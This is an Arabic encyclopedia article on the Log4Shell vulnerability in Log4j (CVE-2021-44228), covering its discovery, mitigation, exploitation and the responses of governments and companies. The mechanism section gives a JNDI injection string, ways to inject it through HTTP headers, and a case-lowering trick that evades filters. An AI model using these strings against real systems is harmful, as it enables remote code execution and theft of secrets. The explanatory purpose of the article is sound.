Log4Shell

تُعدّ ثغرة Log4Shell ( CVE-2021-44228 ) ثغرةً أمنيةً تمّ الإبلاغ عنها في نوفمبر 2021 في Log4j ، وهو إطار عمل شائع لتسجيل الأحداث في جافا ، وتتيح تنفيذ تعليمات برمجية عشوائية ، وقد تمّ استغلالها كثغرة أمنية غير معروفة (ثغرة اليوم الصفر ). [ 2 ] [ 3 ] كانت هذه الثغرة موجودةً دون أن يلاحظها أحد منذ عام 2013، وقد تمّ الكشف عنها بشكلٍ خاص لمؤسسة برمجيات أباتشي ، التي يُعدّ Log4j أحد مشاريعها، من قِبل تشن تشاوجون من فريق أمن Alibaba Cloud في 24 نوفمبر 2021. [ 4 ]

قبل إتاحة مُعرّف CVE الرسمي في 10 ديسمبر 2021، انتشرت الثغرة الأمنية تحت اسم "Log4Shell"، الذي أطلقه عليها فري وورتلي من فريق LunaSec، والذي استُخدم في البداية لتتبع المشكلة على الإنترنت. [ 2 ] [ 1 ] [ 5 ] [ 6 ] [ 7 ] منحت أباتشي ثغرة Log4Shell تصنيف خطورة CVSS بقيمة 10، وهو أعلى تصنيف متاح. [ 8 ] كان استغلال هذه الثغرة سهل التنفيذ، ويُقدّر أنها كانت قادرة على التأثير على مئات الملايين من الأجهزة. [ 7 ] [ 9 ]

تستغل هذه الثغرة الأمنية برنامج Log4j، مما يسمح بإرسال طلبات إلى خوادم LDAP و JNDI عشوائية، [ 2 ] [ 10 ] [ 11 ] وبالتالي تمكين المهاجمين من تنفيذ أكواد Java عشوائية على خادم أو أي جهاز كمبيوتر آخر، أو تسريب معلومات حساسة. [ 6 ] وقد نشر فريق أمن Apache قائمة بمشاريع البرامج المتأثرة . [ 12 ] وتشمل الخدمات التجارية المتأثرة Amazon Web Services ، [ 13 ] وCloudflare و iCloud ، [ 14 ] وMinecraft: Java Edition ، [ 15 ] وSteam و Tencent QQ وغيرها الكثير. [ 10 ] [ 16 ] [ 17 ] ووفقًا لشركتي Wiz و EY ، فقد أثرت هذه الثغرة الأمنية على 93% من بيئات الحوسبة السحابية للمؤسسات. [ 18 ]

أثار الكشف عن الثغرة الأمنية ردود فعل قوية من خبراء الأمن السيبراني. فقد وصفت شركة " تينابل" المتخصصة في الأمن السيبراني هذه الثغرة بأنها "أكبر وأخطر ثغرة أمنية على الإطلاق"، [ 19 ] بينما وصفتها "آرس تكنيكا " بأنها "ربما أخطر ثغرة أمنية على الإطلاق"، [ 20 ] وقالت صحيفة "واشنطن بوست " إن وصف خبراء الأمن لها "يقترب من وصف نهاية العالم". [ 9 ]

خلفية

Log4j هو إطار عمل مفتوح المصدر لتسجيل البيانات ، يسمح لمطوري البرامج بتسجيل البيانات داخل تطبيقاتهم، ويمكنه تضمين مدخلات المستخدم. [ 21 ] يُستخدم على نطاق واسع في تطبيقات جافا، وخاصة برامج المؤسسات. [ 6 ] كُتب في الأصل عام 2001 بواسطة سيكي غولجو، وهو الآن جزء من خدمات تسجيل أباتشي، وهو مشروع تابع لمؤسسة برمجيات أباتشي . [ 22 ] وصف توم كيلرمان، عضو لجنة الأمن السيبراني التابعة للرئيس أوباما ، أباتشي بأنه "أحد الدعامات العملاقة لجسر يُسهّل التواصل بين عالمي التطبيقات وبيئات الحوسبة". [ 23 ]

سلوك

تتيح واجهة تسمية ودليل جافا (JNDI) البحث عن كائنات جافا أثناء تشغيل البرنامج باستخدام مسار بياناتها. يمكن لـ JNDI استخدام عدة واجهات دليل، توفر كل منها آلية مختلفة للبحث عن الملفات. من بين هذه الواجهات بروتوكول الوصول إلى الدليل الخفيف (LDAP)، وهو بروتوكول غير خاص بجافا [ 24 ] يسترجع بيانات الكائن كعنوان URL من خادم مناسب، سواء كان محليًا أو على الإنترنت. [ 25 ]

في الإعدادات الافتراضية، عند تسجيل سلسلة نصية، يقوم Log4j 2 باستبدال السلاسل النصية للتعبيرات من الشكل ${prefix:name}. [ 25 ] على سبيل المثال، Text: ${java:version}قد يتم تحويل إلى Text: Java version 1.7.0_67. [ 26 ] من بين التعبيرات المعترف بها ، التعبير ${jndi:<lookup>}. من خلال تحديد البحث عبر LDAP، يمكن الاستعلام عن أي عنوان URL وتحميله كبيانات كائن Java. ${jndi:ldap://example.com/file}على سبيل المثال، سيقوم بتحميل البيانات من عنوان URL هذا إذا كان متصلاً بالإنترنت. بإدخال سلسلة نصية يتم تسجيلها، يمكن للمهاجم تحميل وتنفيذ تعليمات برمجية ضارة مستضافة على عنوان URL عام. [ 25 ] حتى في حالة تعطيل تنفيذ البيانات، لا يزال بإمكان المهاجم استرداد البيانات - مثل متغيرات البيئة السرية - عن طريق وضعها في عنوان URL، وفي هذه الحالة سيتم استبدالها وإرسالها إلى خادم المهاجم. [ 27 ] [ 28 ] بالإضافة إلى بروتوكول LDAP، تشمل بروتوكولات البحث JNDI الأخرى التي يُحتمل استغلالها: بروتوكول LDAPS الآمن، وبروتوكول استدعاء الأساليب عن بُعد في جافا (RMI)، ونظام أسماء النطاقات (DNS)، وبروتوكول الإنترنت بين كائنات ORB (IIOP). [ 29 ] [ 30 ]

نظرًا لأن طلبات HTTP تُسجّل بشكل متكرر، فإن أحد أساليب الهجوم الشائعة هو وضع السلسلة الخبيثة في عنوان URL لطلب HTTP أو في أحد رؤوس HTTP التي تُسجّل عادةً ، مثل `<T> User-Agent`. تضمنت التدابير الوقائية المبكرة حظر أي طلبات تحتوي على محتويات يحتمل أن تكون خبيثة، مثل ` <T> ${jndi`. [ 31 ] يمكن تجاوز حلول مطابقة السلاسل الأساسية هذه عن طريق تشفير الطلب: ${${lower:j}ndiعلى سبيل المثال، سيتم تحويل `<T>` إلى بحث JNDI بعد إجراء عملية تحويل الأحرف إلى صغيرة على الحرف `<T>` j. [ 32 ] حتى لو لم يتم تسجيل مُدخل، مثل الاسم الأول، على الفور، فقد يتم تسجيله لاحقًا أثناء المعالجة الداخلية وتنفيذ محتوياته. [ 25 ]

التخفيف

صدرت إصلاحات لهذه الثغرة الأمنية في 6 ديسمبر 2021، أي قبل ثلاثة أيام من نشرها، في الإصدار 2.15.0-rc1 من Log4j. [ 33 ] [ 34 ] [ 35 ] شمل الإصلاح تقييد الخوادم والبروتوكولات التي يمكن استخدامها لعمليات البحث. اكتشف الباحثون خطأً برمجيًا ذا صلة، CVE-2021-45046، يسمح بتنفيذ التعليمات البرمجية محليًا أو عن بُعد في بعض التكوينات غير الافتراضية، وقد تم إصلاحه في الإصدار 2.16.0، الذي عطّل جميع الميزات التي تستخدم JNDI ودعم عمليات البحث عن الرسائل. [ 36 ] [ 37 ] تم العثور على ثغرتين أمنيتين إضافيتين في المكتبة: هجوم حجب الخدمة ، تم تتبعه تحت رقم CVE-2021-45105 وتم إصلاحه في الإصدار 2.17.0؛ وثغرة أمنية يصعب استغلالها تسمح بتنفيذ التعليمات البرمجية عن بُعد ، تم تتبعها تحت رقم CVE-2021-44832 وتم إصلاحها في الإصدار 2.17.1. [ 38 ] [ 39 ]org.apache.logging.log4j.core.lookup.JndiLookup في الإصدارات السابقة، يلزم إزالة الفئة من مسار الفئات للتخفيف من حدة كلا الثغرتين. [ 8 ] [ 36 ] كان أحد الحلول الموصى بها مبكرًا للإصدارات القديمة هو ضبط خاصية النظام log4j2.formatMsgNoLookupsعلى true، لكن هذا التغيير لا يمنع استغلال CVE-2021-45046، وقد تبين لاحقًا أنه لا يعطل عمليات البحث عن الرسائل في بعض الحالات. [ 8 ] [ 36 ]

تعمل الإصدارات الأحدث من بيئة تشغيل جافا (JRE) على الحد من هذه الثغرة الأمنية عن طريق منع تحميل التعليمات البرمجية البعيدة افتراضيًا، على الرغم من وجود طرق هجوم أخرى في بعض التطبيقات. [ 2 ] [ 27 ] [ 40 ] [ 41 ] وقد نُشرت عدة طرق وأدوات تساعد في اكتشاف إصدارات Log4j المعرضة للثغرات الأمنية والمستخدمة في حزم جافا المدمجة. [ 42 ]

عندما يتعذر تطبيق الإصدارات المحدثة، نتيجةً لقيودٍ متنوعة كقلة الموارد أو حلول الإدارة الخارجية، كان ترشيح حركة مرور الشبكة الصادرة من الأنظمة المعرضة للاختراق هو الحل الأمثل للكثيرين. [ 43 ] يوصي بهذا النهج كلٌ من مجموعة NCC [ 44 ] والمركز الوطني للأمن السيبراني (المملكة المتحدة) [ 45 ] ، وهو مثالٌ على استراتيجية الدفاع المتعدد الطبقات . وقد أثبتت التجارب المعملية التي أُجريت باستخدام جدران حماية قادرة على اعتراض حركة المرور الصادرة من عدة إصدارات معرضة للاختراق كليًا أو جزئيًا من المكتبة نفسها وبيئة تشغيل جافا ( JRE) فعالية هذا الترشيح [ 46 ] .

الاستخدام

تُمكّن هذه الثغرة الأمنية المخترقين من السيطرة على الأجهزة المُعرّضة للخطر باستخدام لغة جافا. [ 7 ] يستغل بعض المخترقين هذه الثغرة لاستخدام أجهزة الضحايا في تعدين العملات المشفرة ، وإنشاء شبكات الروبوتات ، وإرسال البريد العشوائي، وإنشاء أبواب خلفية ، وغيرها من الأنشطة غير القانونية مثل هجمات برامج الفدية . [ 7 ] [ 9 ] [ 47 ] في الأيام التي تلت الكشف عن هذه الثغرة، رصدت شركة تشيك بوينت ملايين الهجمات التي شنّها المخترقون، حيث لاحظ بعض الباحثين معدلًا يزيد عن مئة هجوم في الدقيقة، ما أسفر في النهاية عن محاولات هجوم على أكثر من 40% من شبكات الأعمال على مستوى العالم. [ 7 ] [ 23 ]

بحسب ماثيو برينس ، الرئيس التنفيذي لشركة كلاود فلير ، تعود أدلة استغلال الثغرة أو البحث عنها إلى الأول من ديسمبر، أي قبل تسعة أيام من الكشف عنها علنًا. [ 48 ] ووفقًا لشركة الأمن السيبراني غراي نويز، قامت عدة عناوين IP بمسح مواقع الويب للتحقق من وجود خوادم مصابة بالثغرة. [ 49 ] وبدأت عدة شبكات بوتات بالبحث عن الثغرة، بما في ذلك شبكة بوتات موهستيك بحلول 10 ديسمبر، بالإضافة إلى ميراي وتسونامي. [ 7 ] [ 48 ] [ 50 ] ولوحظ استخدام مجموعة برامج الفدية كونتي للثغرة في 17 ديسمبر. [ 9 ]

استغلت بعض الجماعات المدعومة من دول في الصين وإيران هذه الثغرة الأمنية، وفقًا لشركة تشيك بوينت، لكن من غير المعروف ما إذا كانت إسرائيل أو روسيا أو الولايات المتحدة قد استخدمتها قبل الكشف عن هذه الثغرة. [ 9 ] [ 19 ] وأفادت تشيك بوينت أن قراصنة مدعومين من إيران حاولوا في 15 ديسمبر/كانون الأول 2021 اختراق شبكات شركات ومؤسسات حكومية إسرائيلية. [ 9 ]

الاستجابة والتأثير

الحكومة

في الولايات المتحدة، وصفت جين إيسترلي ، مديرة وكالة الأمن السيبراني وأمن البنية التحتية (CISA)، الثغرة الأمنية بأنها "من أخطر الثغرات التي شهدتها في مسيرتي المهنية، إن لم تكن أخطرها على الإطلاق"، موضحةً أن مئات الملايين من الأجهزة قد تأثرت، ونصحت الموردين بإعطاء الأولوية لتحديثات البرامج. [ 7 ] [ 51 ] [ 47 ] وكان أمام الوكالات المدنية المتعاقدة مع حكومة الولايات المتحدة مهلة حتى 24 ديسمبر 2021 لتصحيح الثغرات الأمنية. [ 9 ] وفي 4 يناير، أعلنت لجنة التجارة الفيدرالية (FTC) عزمها ملاحقة الشركات التي لا تتخذ خطوات معقولة لتحديث برنامج Log4j المستخدم. [ 52 ] وفي اجتماع بالبيت الأبيض، تم توضيح أهمية صيانة أمن البرامج مفتوحة المصدر - والتي غالبًا ما يقوم بها عدد قليل من المتطوعين - للأمن القومي. فبينما تحظى بعض مشاريع البرامج مفتوحة المصدر باهتمام كبير ، لا يوجد لدى البعض الآخر عدد كافٍ من الأشخاص أو حتى أي شخص يضمن أمنها. [ 53 ] [ 54 ]

صنّف المكتب الاتحادي الألماني لأمن المعلومات (BSI) الثغرة الأمنية ضمن أعلى مستويات التهديد، واصفًا إياها بأنها "حالة تهديد بالغة الخطورة". كما أفاد المكتب بنجاح عدة هجمات، وأنّ تقييم مدى خطورة الثغرة لا يزال صعبًا. [ 55 ] [ 56 ] وبدأ المركز الوطني الهولندي للأمن السيبراني (NCSC) بإعداد قائمة مستمرة بالتطبيقات المعرضة للخطر. [ 57 ] [ 58 ]

دعا المركز الكندي للأمن السيبراني (CCCS) المنظمات إلى اتخاذ إجراءات فورية. [ 59 ] وأغلقت وكالة الإيرادات الكندية خدماتها الإلكترونية مؤقتًا بعد اكتشاف الثغرة الأمنية، بينما أغلقت حكومة كيبيك ما يقرب من 4000 موقع إلكتروني كإجراء وقائي. [ 60 ] وتعرضت وزارة الدفاع البلجيكية لمحاولة اختراق، ما اضطرها إلى إغلاق جزء من شبكتها. [ 61 ]

علّقت وزارة الصناعة وتكنولوجيا المعلومات الصينية العمل مع شركة علي بابا كلاود كشريك في مجال استخبارات التهديدات السيبرانية لمدة ستة أشهر لعدم إبلاغها الحكومة أولاً عن الثغرة الأمنية. [ 62 ]

الشركات

أظهرت دراسة أجرتها شركتا Wiz و EY [ 18 ] أن 93% من بيئات الحوسبة السحابية للمؤسسات كانت عرضة لثغرة Log4Shell. 7% من أحمال العمل المعرضة للخطر متصلة بالإنترنت وعرضة لمحاولات استغلال واسعة النطاق. ووفقًا للدراسة، بعد عشرة أيام من الكشف عن الثغرة (20 ديسمبر 2021)، لم يتم ترقيع سوى 45% من أحمال العمل المعرضة للخطر في بيئات الحوسبة السحابية. وقد تأثرت بيانات الحوسبة السحابية لشركات أمازون وجوجل ومايكروسوفت بثغرة Log4Shell. [ 9 ] ودعت مايكروسوفت عملاء ويندوز وأزور إلى توخي الحذر بعد رصد هجمات من جهات مدعومة من دول وجماعات إجرامية إلكترونية تقوم بفحص الأنظمة بحثًا عن ثغرة Log4Shell في Log4j حتى ديسمبر 2021. [ 63 ]

استُهدفت شركة UKG، المتخصصة في إدارة الموارد البشرية والقوى العاملة، وهي إحدى أكبر الشركات في هذا القطاع، بهجوم فدية إلكترونية أثّر على شركات كبرى . [ 20 ] [ 64 ] وأفادت UKG بعدم وجود دليل على استغلال برنامج Log4Shell في الحادث، إلا أن المحلل آلان ليسكا من شركة Recorded Future للأمن السيبراني أشار إلى احتمال وجود صلة. [ 64 ]

مع بدء الشركات الكبرى في إصدار تحديثات لمعالجة الثغرة الأمنية، ازداد الخطر على الشركات الصغيرة حيث ركز المتسللون على الأهداف الأكثر ضعفاً. [ 47 ]

خصوصية

كانت بعض الأجهزة الشخصية المتصلة بالإنترنت، مثل أجهزة التلفاز الذكية وكاميرات المراقبة، عرضة للاستغلال. وقد لا تحصل بعض البرامج على تحديثات أمنية بسبب توقف دعم الشركات المصنعة لها. [ 9 ]

تحليل

اعتبارًا من 14 ديسمبر 2021  ،تعرض ما يقارب نصف شبكات الشركات عالميًا لهجمات إلكترونية مكثفة، حيث تم اكتشاف أكثر من 60 نسخة مختلفة من الثغرة الأمنية خلال 24 ساعة. [ 65 ] وصفت شركة Check Point Software Technologies الوضع بأنه "جائحة إلكترونية حقيقية"، وأكدت أن الأضرار المحتملة "لا تُحصى". [ 66 ] بالغت بعض التحذيرات الأولية في تقدير عدد الحزم البرمجية المعرضة للخطر، مما أدى إلى نتائج إيجابية خاطئة. والجدير بالذكر أن حزمة "log4j-api" وُصفت بأنها معرضة للخطر، بينما أظهرت الأبحاث اللاحقة أن حزمة "log4j-core" الرئيسية فقط هي المعرضة للخطر. وقد تأكد ذلك في سلسلة نقاشات المشكلة الأصلية [ 67 ] ومن قبل باحثين أمنيين خارجيين. [ 68 ]

كتبت مجلة Wired التقنية أنه على الرغم من الضجة السابقة التي أحاطت بالعديد من الثغرات الأمنية، فإن ثغرة Log4j  تستحق كل هذا الضجيج لأسباب عديدة. [ 19 ] وأوضحت المجلة أن انتشار Log4j، وصعوبة اكتشاف الثغرة من قبل الأهداف المحتملة، وسهولة نقل الشيفرة إلى الضحايا، خلقت "مزيجًا من الخطورة والبساطة والانتشار أثار قلق مجتمع الأمن السيبراني". [ 19 ] كما حددت Wired مراحل استخدام المخترقين لـ Log4Shell؛ حيث تستغل مجموعات تعدين العملات الرقمية الثغرة أولًا، ثم يقوم سماسرة البيانات ببيع "موطئ قدم" للمجرمين الإلكترونيين، الذين ينخرطون في النهاية في هجمات برامج الفدية والتجسس وتدمير البيانات. [ 19 ]

صرح أميت يوران ، الرئيس التنفيذي لشركة Tenable والمدير المؤسس لفريق الاستعداد لحالات الطوارئ الحاسوبية في الولايات المتحدة ، قائلاً: "[Log4Shell] هي بلا شك أكبر وأخطر ثغرة أمنية على الإطلاق"، مشيراً إلى أن الهجمات المتطورة بدأت بعد وقت قصير من اكتشاف الثغرة، وأضاف: "نشهد بالفعل استغلالها في هجمات برامج الفدية، وهو ما يُعدّ ناقوس خطر كبير  ... كما وردت إلينا تقارير عن مهاجمين يستخدمون Log4Shell لتدمير الأنظمة دون حتى السعي لجمع الفدية، وهو سلوك غير مألوف". [ 19 ] وقال شون غالاغر، كبير باحثي التهديدات في شركة Sophos : "بصراحة، يكمن أكبر تهديد هنا في أن أشخاصاً ما قد تمكنوا بالفعل من الوصول إلى النظام ويحتفظون به، وحتى لو تم إصلاح المشكلة، فسيظل هناك من يخترق الشبكة  ... ستبقى هذه الثغرة موجودة طالما بقي الإنترنت". [ 19 ]

بحسب تقرير لوكالة بلومبيرغ الإخبارية ، فقد وُجّه بعض الغضب إلى مطوري أباتشي بسبب فشلهم في إصلاح الثغرة الأمنية بعد التحذيرات التي صدرت في مؤتمر للأمن السيبراني عام 2016 بشأن استغلال فئات واسعة من البرامج، بما في ذلك Log4j. [ 69 ]

مراجع

  1. 1 2 بوفولني، ستيف؛ ماكي، دوغلاس (10 ديسمبر 2021). "ثغرات Log4Shell هي الفحم الذي نملكه لعام 2021" . ماكافي . تم الاسترجاع في 12 ديسمبر 2021 .
  2. 1 2 3 4 وورتلي، فري؛ ثرومسون، كريس؛ أليسون، فورست (9 ديسمبر 2021). "Log4Shell: تم اكتشاف ثغرة أمنية من نوع RCE في log4j 2، وهي حزمة تسجيل جافا شائعة" . LunaSec . مؤرشف من الأصل في 16 يونيو 2024. تم الاطلاع عليه في 16 يونيو 2024 .
  3. "CVE-2021-44228" . الثغرات الأمنية الشائعة والتعرضات . تم الاطلاع عليه بتاريخ 12 ديسمبر 2021 .
  4. "داخل السباق لإصلاح خلل برمجي كارثي محتمل" . Bloomberg.com . 13 ديسمبر 2021. تم الاطلاع عليه بتاريخ 19 نوفمبر 2024 .
  5. "أخطر ثغرة أمنية من نوع RCE في Apache Log4j تم اكتشافها على الإنترنت" . مركز سايبر كيندرا . 9 ديسمبر 2021. تاريخ الاطلاع: 12 ديسمبر 2021 .
  6. 1 2 3 نيومان، ليلي هاي (10 ديسمبر 2021). ""الإنترنت يشتعل"" . Wired . ISSN 1059-1028 . تم الاطلاع عليه بتاريخ 12 ديسمبر 2021 . 
  7. 1 2 3 4 5 6 7 مورفي، هانا (14 ديسمبر 2021). "قراصنة يشنون أكثر من 1.2 مليون هجوم عبر ثغرة Log4J" . فايننشال تايمز . تم الاطلاع عليه بتاريخ 17 ديسمبر 2021 .
  8. 1 2 3 "ثغرات أمنية في Apache Log4j" . Log4j . مؤسسة برمجيات Apache . تم الاطلاع عليه بتاريخ 12 ديسمبر 2021 .
  9. 1 2 3 4 5 6 7 8 9 هانتر، تاتوم؛ دي فينك، جيريت (20 ديسمبر 2021). "أخطر اختراق أمني على الإطلاق يحدث الآن. إليك ما تحتاج إلى معرفته" . صحيفة واشنطن بوست .
  10. 1 2 موت، ناثانيال (10 ديسمبر 2021). "عدد لا يحصى من الخوادم عرضة لثغرة أمنية من نوع "يوم الصفر" في Apache Log4j" . مجلة PC . تم الاطلاع عليه بتاريخ 12 ديسمبر 2021 .
  11. غودين، دان (10 ديسمبر 2021). "ثغرة أمنية في أداة Log4j واسعة الانتشار تُشكّل تهديدًا خطيرًا للإنترنت" . آرس تكنيكا . تاريخ الاسترجاع: 12 ديسمبر 2021 .
  12. "مشاريع أباتشي متأثرة بثغرة log4j CVE-2021-44228" . 14 ديسمبر 2021.
  13. "تحديث بشأن ثغرة Apache Log4j2 (CVE-2021-44228)" . خدمات أمازون السحابية . ١٢ ديسمبر ٢٠٢١. تم الاطلاع عليه بتاريخ ١٣ ديسمبر ٢٠٢١ .
  14. لوفجوي، بن (14 ديسمبر 2021). "أبل تُصلح ثغرة Log4Shell في iCloud، والتي وُصفت بأنها الأخطر منذ عقد" . 9to5Mac .
  15. "ثغرة أمنية في ماينكرافت: إصدار جافا" . ماينكرافت . استوديوهات موجانغ . تم الاطلاع عليه بتاريخ 13 ديسمبر 2021 .
  16. غودين، دان (10 ديسمبر 2021). "أكبر اللاعبين في الإنترنت متأثرون بثغرة Log4Shell الخطيرة من نوع 0-day" . ArsTechnica . تم الاطلاع عليه بتاريخ 13 ديسمبر 2021 .
  17. راندل، ديفيد أوبيرتي وجيمس (15 ديسمبر 2021). "ما هي ثغرة Log4j الأمنية؟" . صحيفة وول ستريت جورنال - عبر www.wsj.com.
  18. ١ ٢ "المؤسسات في منتصف عملية تحديث Log4Shell | مدونة Wiz" . www.wiz.io. ٢٠ ديسمبر ٢٠٢١. تم الاطلاع عليه بتاريخ ٢٠ ديسمبر ٢٠٢١ .
  19. 1 2 3 4 5 6 7 باريت، برايان. "الموجة القادمة من هجمات Log4J ستكون وحشية" . مجلة Wired . الرقم الدولي الموحد للدوريات 1059-1028 . تاريخ الاسترجاع: 17 ديسمبر 2021 . 
  20. 1 2 غودين، دان (13 ديسمبر 2021). "مع تسبب برنامج Log4Shell في فوضى عارمة، أبلغت خدمة الرواتب عن هجوم ببرنامج الفدية" . آرس تكنيكا . تم الاطلاع عليه في 17 ديسمبر 2021 .
  21. يان، تاو؛ دينغ، تشي؛ تشانغ، هاوتشي؛ فو، يو؛ غرونزويغ، جوش (10 ديسمبر 2021). "ثغرة أمنية أخرى في Apache Log4j يتم استغلالها بنشاط في بيئة حقيقية (CVE-2021-44228)" . الوحدة 42. بالو ألتو نتوركس .
  22. "Apache Log4j 2" . مؤسسة برمجيات أباتشي . تم الاطلاع عليه بتاريخ 12 ديسمبر 2021 .
  23. 1 2 بيرنز، جيسي (14 ديسمبر 2021). "هيلكون فالي - ثغرة أمنية في أباتشي تدق ناقوس الخطر" . ذا هيل . تم الاطلاع عليه بتاريخ 17 ديسمبر 2021 .
  24. سيرميرشيم، ج. (يونيو 2006). بروتوكول الوصول إلى الدليل الخفيف (LDAP): البروتوكول . فرقة العمل الإلكترونية الدولية. doi : 10.17487/RFC4513 . RFC rfc4511 . تم الاطلاع عليه بتاريخ 13 ديسمبر 2021 .
  25. 1 2 3 4 غراهام-كومينغ، جون (10 ديسمبر 2021). "نظرة معمقة على ثغرة Log4j2 (CVE-2021-44228)" . مدونة كلاود فلير . تاريخ الاطلاع: 13 ديسمبر 2021 .
  26. "عمليات البحث" . Log4j . مؤسسة برمجيات أباتشي . تم الاسترجاع في 13 ديسمبر 2021 .
  27. 1 2 داكلين، بول (12 ديسمبر 2021). "شرح Log4Shell - كيف يعمل، ولماذا تحتاج إلى معرفته، وكيفية إصلاحه" . Naked Security . Sophos . تم الاطلاع عليه بتاريخ 12 ديسمبر 2021 .
  28. ميسلر، دانيال (13 ديسمبر 2021). "وضع log4j (Log4Shell)" . التعلم غير الخاضع للإشراف .
  29. دورايشامي، رانغا؛ فيرما، أشيش؛ أنغ، ميغيل كارلو (13 ديسمبر 2021). "تم استغلال ثغرة أمنية في Apache Log4j تُسمى Log4Shell بشكل فعال" . تريند مايكرو . تم الاطلاع عليه في 14 ديسمبر 2021 .
  30. نارانج، ساتنام (10 ديسمبر 2021). "CVE-2021-44228: إثبات المفهوم لثغرة تنفيذ التعليمات البرمجية عن بُعد الحرجة في Apache Log4j (Log4Shell)" . مدونة Tenable . تم الاطلاع عليه بتاريخ 14 ديسمبر 2021 .
  31. غابور، غابرييل؛ بلوهس، غابرييل (10 ديسمبر 2021). "CVE-2021-44228 - معالجة ثغرة تنفيذ التعليمات البرمجية عن بُعد في Log4j" . مدونة كلاود فلير . تم الاطلاع عليه بتاريخ 13 ديسمبر 2021 .
  32. هاهاد، منير (12 ديسمبر 2021). "ثغرة أمنية في Apache Log4j (CVE-2021-44228) تثير مخاوف واسعة النطاق" . تم الاطلاع عليه بتاريخ 12 ديسمبر 2021 .
  33. "تقييد الوصول إلى LDAP عبر JNDI بواسطة rgoers #608" . Log4j . 5 ديسمبر 2021. تم الاطلاع عليه في 12 ديسمبر 2021 عبر GitHub .
  34. بيرغر، أندرياس (17 ديسمبر 2021). "ما هو Log4Shell؟ شرح ثغرة Log4j (وكيفية معالجتها)" . أخبار Dynatrace . أصدرت أباتشي رقعةً أمنيةً للثغرة CVE-2021-44228، الإصدار 2.15، في 6 ديسمبر. مع ذلك، لم تُصلح هذه الرقعة جزءًا من الثغرة، مما أدى إلى ظهور الثغرة CVE-2021-45046 وإصدار رقعة ثانية، الإصدار 2.16، في 13 ديسمبر. كما أصدرت أباتشي رقعةً ثالثةً، الإصدار 2.17، في 17 ديسمبر لإصلاح ثغرة أخرى ذات صلة، CVE-2021-45105.
  35. روديس، بوب (10 ديسمبر 2021). "استغلال واسع النطاق لتنفيذ التعليمات البرمجية عن بُعد في Apache Log4j | مدونة Rapid7" . Rapid7 .
  36. 1 2 3 "CVE-2021-45046" . الثغرات الأمنية الشائعة . 15 ديسمبر 2021. تم الاطلاع عليه بتاريخ 15 ديسمبر 2021 .
  37. غريغ، جوناثان (14 ديسمبر 2021). "اكتشاف ثغرة أمنية ثانية في Log4j، وإصدار التحديث بالفعل" . ZDNet . تم الاطلاع عليه بتاريخ 17 ديسمبر 2021 .
  38. "CVE-2021-45105" . قاعدة بيانات الثغرات الأمنية الوطنية . تم الاطلاع عليها بتاريخ 4 يناير 2022 .
  39. "CVE-2021-44832" . قاعدة بيانات الثغرات الأمنية الوطنية . تم الاطلاع عليها بتاريخ 4 يناير 2022 .
  40. "ملاحظات إصدار Java(TM) SE Development Kit 8، التحديث 121 (JDK 8u121)" . أوراكل. 17 يناير 2017. تم الاطلاع عليه بتاريخ 13 ديسمبر 2021 .
  41. "استغلال ثغرات حقن JNDI في جافا" . فيراكود . 3 يناير 2019. تم الاطلاع عليه بتاريخ 15 ديسمبر 2021 .
  42. "دليل: كيفية اكتشاف ثغرة Log4Shell الأمنية (CVE-2021-44228) والتخفيف من آثارها" . www.lunasec.io . ١٣ ديسمبر ٢٠٢١. تم الاطلاع عليه بتاريخ ١٣ ديسمبر ٢٠٢١ .
  43. "مراجعة لفعالية Log4j لشهر ديسمبر 2021" (ملف PDF) . مجلس مراجعة الأمن السيبراني . 11 يوليو 2022. تاريخ الاطلاع: 18 يناير 2023 .
  44. "توصيات وموارد Apache Log4j Zero Day" . مجموعة NCC . تم الاطلاع عليه بتاريخ 18 يناير 2023 .
  45. "تنبيه: ثغرات أمنية في Apache Log4j" . المركز الوطني للأمن السيبراني (المملكة المتحدة) . 10 ديسمبر 2021. تم الاطلاع عليه بتاريخ 18 يناير 2023 .
  46. "Log4Shell وآثاره في مرشح خروج الشبكة" . Chaser Systems . 12 ديسمبر 2021. تم الاطلاع عليه بتاريخ 18 يناير 2023 .
  47. 1 2 3 وود يارد، كريس. ""ثغرة أمنية خطيرة": قد تجد الشركات الصغيرة صعوبة أكبر في منع المتسللين من استغلال ثغرة Log4j . يو إس إيه توداي . تاريخ الاطلاع: 17 ديسمبر 2021 .
  48. 1 2 داكيت، كريس. "بدأ نشاط تنفيذ التعليمات البرمجية عن بُعد باستخدام Log4j في 1 ديسمبر مع بدء شبكات الروبوتات في استغلال الثغرة الأمنية" . ZDNet . تم الاطلاع عليه في 13 ديسمبر 2021 .
  49. "استغلال ثغرة أمنية في Apache Log4j - CVE-2021-44228" . أبحاث Greynoise . 10 ديسمبر 2021. تاريخ الاطلاع: 14 ديسمبر 2021 .
  50. زوغيك، مارتن (13 ديسمبر 2021). "تنبيه فني: استغلال ثغرة أمنية خطيرة في Log4j2 في بيئة حقيقية" . رؤى الأعمال . بيت ديفندر .
  51. "بيان من مدير وكالة الأمن السيبراني وأمن البنية التحتية (CISA) إيسترلي بشأن ثغرة "Log4j" . وكالة الأمن السيبراني وأمن البنية التحتية (CISA) . 11 ديسمبر 2021.
  52. «لجنة التجارة الفيدرالية تحذر الشركات من ضرورة معالجة ثغرة أمنية في Log4j» . لجنة التجارة الفيدرالية (FTC). 4 يناير 2022. تم الاطلاع عليه بتاريخ 6 يناير 2022 .
  53. "بعد Log4j، أصبح البرمجيات مفتوحة المصدر الآن قضية أمن قومي" . جيزمودو . تم الاطلاع عليه بتاريخ 16 يناير 2022 .
  54. غريغ، جوناثان. "بعد Log4j، البيت الأبيض يخشى الثغرة الأمنية الكبيرة التالية في البرمجيات مفتوحة المصدر" . ZDNet . تم الاطلاع عليه بتاريخ 16 يناير 2022 .
  55. ^ سويروين ، يورج (12 ديسمبر 2021). "تحذير BSI من أجل Sicherheitslücke" . تاجيسشاو (في المانيا).
  56. "Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage" [ إنذار أحمر: ثغرة Log4Shell تسبب حالة تهديد حرجة للغاية ] (بيان صحفي) (باللغة الألمانية). المكتب الاتحادي لأمن المعلومات . 11 ديسمبر 2021.
  57. ج. فوغان-نيكولز، ستيفن (14 ديسمبر 2021). "Log4Shell: نحن في ورطة كبيرة" . The New Stack .
  58. "NCSC-NL/log4shell" . المركز الوطني للأمن السيبراني (هولندا) . تم الاطلاع عليه بتاريخ 14 ديسمبر 2021 عبر GitHub.
